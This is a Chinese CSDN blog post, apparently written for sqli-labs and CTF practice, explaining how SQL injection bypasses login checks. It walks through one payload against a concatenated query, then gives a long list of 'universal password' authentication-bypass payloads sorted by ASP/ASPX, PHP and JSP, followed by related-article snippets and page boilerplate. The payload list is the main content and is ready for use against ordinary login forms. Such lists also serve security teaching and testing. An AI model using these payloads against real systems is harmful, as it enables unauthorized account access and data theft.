sql注入之万能密码总结

最新推荐文章于 2024-04-19 20:49:57 发布
最新推荐文章于 2024-04-19 20:49:57 发布
阅读量2.7w 收藏 84
点赞数 24
分类专栏: sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hxhxhxhxx/article/details/108020010
版权

sql注入之万能密码总结

万能密码

啊这,一般用来ctf登录的时候试试,
这是sqli-labs用的时候,我来记录一下

万能密码原理

在这里插入图片描述

原验证登陆语句:

SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."'

输入 1′ or 1=1 or ‘1’=’1万能密码语句变为:

SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG'

即得到优先级关系:or<and<not,同一优先级默认从左往右计算。

(1.)上面’1’=‘1’ AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG’先计算肯定返回false,因为密码是我们乱输入的。(此处是假)

(2.)Username=‘1’ 返回假,没有用户名是1(此处是假)

(3.)1=1返回真(此处是真)

以上的结果是: 假 or 真 or假 返回真。验证通过。

在这里插入图片描述

万能密码

' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1
asp aspx万能密码

1:”or “a”=”a
2: ‘)or(‘a’=’a
3:or 1=1–
4:’or 1=1–
5:a’or’ 1=1–
6:”or 1=1–
7:’or’a’=’a
8:”or”=”a’=’a
9:’or”=’
10:’or’=’or’
11: 1 or ‘1’=’1’=1
12: 1 or ‘1’=’1’ or 1=1
13: ‘OR 1=1%00
14: “or 1=1%00
15: ‘xor
16: 用户名 ’ UNION Select 1,1,1 FROM admin Where ”=’ (替换表名admin)
密码 1
17…admin’ or ‘a’=’a 密码随便

PHP万能密码

‘or 1=1/*
User: something
Pass: ’ OR ‘1’=’1

jsp 万能密码

1’or’1’=’1
admin’ OR 1=1/*

無名之涟
关注
  • 24
    点赞
  • 84
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入万能密码字典
墨痕诉清风的博客
07-13 2000
111
sql注入万能密码
05-19
sql注入万能密码 全部的万能代码 如"or "a"="a 等等很多
SQL注入万能密码.docx
06-04
什么是sql注入万能密码?用的语法是什么?用万能密码可以判断网站是否存在注入漏洞,在渗透测试中非常有用
SQL注入作业
最新发布
在这里,你可以了解到关于C++,数据结构,Linux等知识点
04-19 1106
实际上这个过程是,admin'# 作为用户名登录后,数据库对该用户名,密码信任,实际上这个用户名被代码替换后,登录的不是admin'# ,而是admin。修改的是admin的密码,这就是二阶注入的原理。所谓的二阶注入,利用的是,数据库系统对已有信息的“信任”,将注入的用户名输入到系统后,利用这种信任,登录到数据库其他用户,比如admin'#成功注册后,但是登录的却是admin。此时,username为8 ,根据or的运算,3=3是永真式,#将后半句注释了,故这句代码执行结果永远为真,可以登录成功。
0基础学习SQL注入之万能账号密码(BUUctf例题-[极客大挑战 2019]EasySQL1)
weixin_49765221的博客
04-12 1191
sql注入学习
sql注入语句万能密码_sql注入——万能密码
weixin_40001025的博客
12-06 5888
通过两个ctf题来做讲解,第一个很简单,第二个多了些限制http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.phphttp://ctf5.shiyanbar.com/web/wonderkun/web/index.html 万能密码原理万能密码漏洞都是因为提交字符未加过滤或过滤不严而导致的。$sql =...
万能密码sql注入
hk_hkl的博客
07-17 6154
万能密码利用的原理就是在后台登陆页面没有对用户输入的内容进行验证,此时程序所用用户输入的数据都合法的,所以这个时候无论是合法的管理员还是非法的入侵者所输入的数据都是被信任的,非法入侵者正是利用这一特点来进行非法登录的。当我们在登录界面输入 【万能账号】比如 a’ or true # 以后,后端会将我们输入的参数拼接到SQL中,然后去数据库中查询账号和密码。,所以这需要使用 a’ or 1 – a 而不是 a’ or 1 --a 其原理和 a’ or 1 # 大同小异。
SQL注入(万能密码)
qq_69432323的博客
03-14 5448
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)
sql注入万能密码解析
qq_52843411的博客
08-22 416
由引号,我们为了语法格式的正确,所以对1前加了一个引号,如同admin与cn后的引号一样,是为了和页面代码所对应,否则会报错,而我们真正的万能密码,后面加了#注释了后面所有的语句,我们1就不用为了与之后的引号对应,所以1前的引号就不用加了,否则加了会导致报错,而前一个1加不加都行。经过我们的运算,这个or语句为真,我们就通过这个万能的语句成功实现了未知用户和密码的登录。我们在这个万能用户名的后面加了个#,#是一个注释符,后面的语句就不会执行了。#两个万能密码1的引号没了,1本来带引号是因为。
简单的SQL注入---id和万能密码
qq_74414939的博客
05-08 2192
id和万能密码
SQL注入万能密码登录
山兔的博客
10-26 4121
今天的靶机是一个主要面向web应用程序的框架。更具体地说,我们将了解如何对启用了SQL数据库的web应用程序执行SQL注入。我们的目标是具有针对后端数据库的搜索功能的网站,该数据库包含易受此攻击的可搜索项目攻击类型。任何用户都不应该看到此数据库中的所有项目,因此网站将为我们提供不同的搜索结果。SQL 服务通常如何运行的一个很好的例子是用于任何用户的登录过程。每次用户要登录时,Web 应用程序都会将登录页输入(用户名/密码组合)发送到 SQL 服务,并将其与该特定用户的存储数据库条目进行比较。
注入总结万能密码
06-15
适用的网络安全学习资源,PHP+MySql,ASP+Access,ASP+Ms Sql
#资源分享达人# 探索Mysql最新过狗万能密码.zip
08-03
#资源分享达人# MySQL
计算机病毒与防护:SQL注入原理.ppt
06-10
SQL注入的危害-绕过登录 某高校招聘录入系统登录框存在SQL注入漏洞: SQL注入的危害-数据盗取 智慧医疗安全之云信医疗主站存在SQL注入漏洞,涉及近500W+用户数据: SQL注入的分类 SQL注入测试方法 判断注入漏洞的...
万能密码诠释SQL注入
m0_58231750的博客
03-15 945
确实,随着服务器性能的进一步提升,在如今的现实情况下,基本上日常常用的网站,都已经把防sql注入做得很好了,但没有绝对安全的代码,保持警惕还是很有必要的,而且很多小网站,由于运营方资金精力等原因,往往对于网站的防护做得并没有那么好,就存在注入漏洞。,直接把客户端发来的请求数据包中的内容转化成一段sql语句,然后发送给数据库服务器,数据库服务器根据web服务器发来的sql语句,也。,直接执行并把执行结果反馈给web服务器,web服务器收到数据库服务器反馈的内容后,没有做过滤,
快捷SQL注入,密码渗透
QJH_cainiaowenit的博客
04-17 187
需要注意的是,以下所有万能账号中的 a 可以是自定义的数字或字母,比如 1,2,3,b,c,d。万能账号并不是一个真正意义上的账号,它是一种【拥有不同变体的格式】万能密码并不是一个真正意义上的密码,而是一个【拥有不同变体的格式】当我们不知道用户的账号并且不知道用户的密码时,可以使用万能账号。当我们知道用户的账号,但不知道用户的密码时,可以使用万能密码。需要注意的是:万能密码中的 admin,必须是真实的用户名。账号输入 【万能账号】, 比如 a or true #【单引号字符串型万能密码
SQL注入原理——万能密码注入
WQ_762的博客
08-06 4781
万能密码】的原理 用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。针对此BBS论坛,当用户登录时,后台执行的数据库查询操作(SQL语句)是【Selectuser id,user type,email From users Where user id=’用户名’ And password=’密码’】 由于网站后台在进行数据库查询的时候没有对单引号进行过滤...
sql注入万能密码总结
坚持硬核
01-30 3651
select * from admin where username='' and password ='' 第一种: 当你已知管理员账号名为admin时可以直接尝试 admin' # select * from admin where username='admin' #'and password='' 一些事实: mysql在处理弱类型的时候,比如说非数字开头的字符串和数字相加,字符串会被认为是0 证明:非数字开头的字符串和0是相等的 数字开头的字符串: 也就说: selec
SQL注入万能密码
热门推荐
Jim的博客
08-18 1万+
万能密码形式:'or'='or'  例如:select * from table where username='' or '=' or '' and password='';   //and优先于or,且'='为真 类似形式还有: "or"a"="a      ')or('a'='a ")or("a"="a 'or 1=1-- "or 1=1-- 'or"=' ‘or’='or
sql注入万能密码原理
06-07
SQL注入攻击是指通过在Web应用程序中注入恶意的SQL代码,使攻击者能够访问或修改数据库中的数据。通过SQL注入攻击,攻击者可以绕过认证、访问敏感数据、修改数据、甚至直接控制整个数据库服务器。 SQL注入攻击的万能密码原理是利用SQL语句中的漏洞,通过构造特定的SQL语句,使SQL语句执行时绕过了原本的身份验证和密码验证,从而达到绕过身份验证直接登录或者获取密码的目的。一般来说,攻击者会在输入框等用户输入数据的地方注入特定的代码,从而绕过了原本的身份验证和密码验证。 因此,在开发Web应用程序时,需要注意防范SQL注入攻击,可以采用参数化查询等方式来防范SQL注入攻击。同时,对于用户输入的数据,需要进行严格的验证和过滤,避免输入恶意的SQL代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值